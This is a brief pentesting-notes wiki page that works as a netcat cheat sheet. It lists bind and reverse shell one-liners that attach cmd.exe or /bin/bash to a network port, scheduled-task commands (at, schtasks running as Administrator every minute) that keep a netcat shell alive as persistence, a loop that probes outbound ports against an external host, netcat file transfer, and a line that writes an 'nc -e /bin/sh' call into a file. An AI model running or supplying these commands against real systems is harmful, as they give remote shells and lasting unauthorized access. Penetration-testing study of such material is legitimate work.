NETCAT

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Shell from windows to linux

root@kali:~# nc -nv a.b.c.d 4444
c:\User\offsec>nc -nlvp 4444 -e cmd.exe

shell from linux to windows

root@kali:~# nc -nlvp 4444 -e /bin/bash
c:\User\offsec>nc -nv a.b.c.d 4444

Schedule with AT

at 0:19 ""nc.exe -v <IP> <PORT> -d -e cmd.exe""

or

echo nc.exe -v <IP> <PORT> -L -d -e cmd.exe >c:\netcat.cmd
schtasks /create /tn rb /tr "c:\netcat.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""

Check outbound ports

for /L %i in (1,1,1024) do @nc.exe -z -v open.zorinaq.com %i | findstr "Yep"


Fileserver

nc -q1 -lvp 1234 < file.txt
nc <IPADDRESS> 1234 > output.txt #to retrieve file from remote host.

Misc

echo "nc -e /bin/sh <IPADDRESS> <PORT>" >> /tmp/run
printf "HEAD / HTTP/1.0\r\n\r\n" |nc -n -i 1 192.168.13.219 80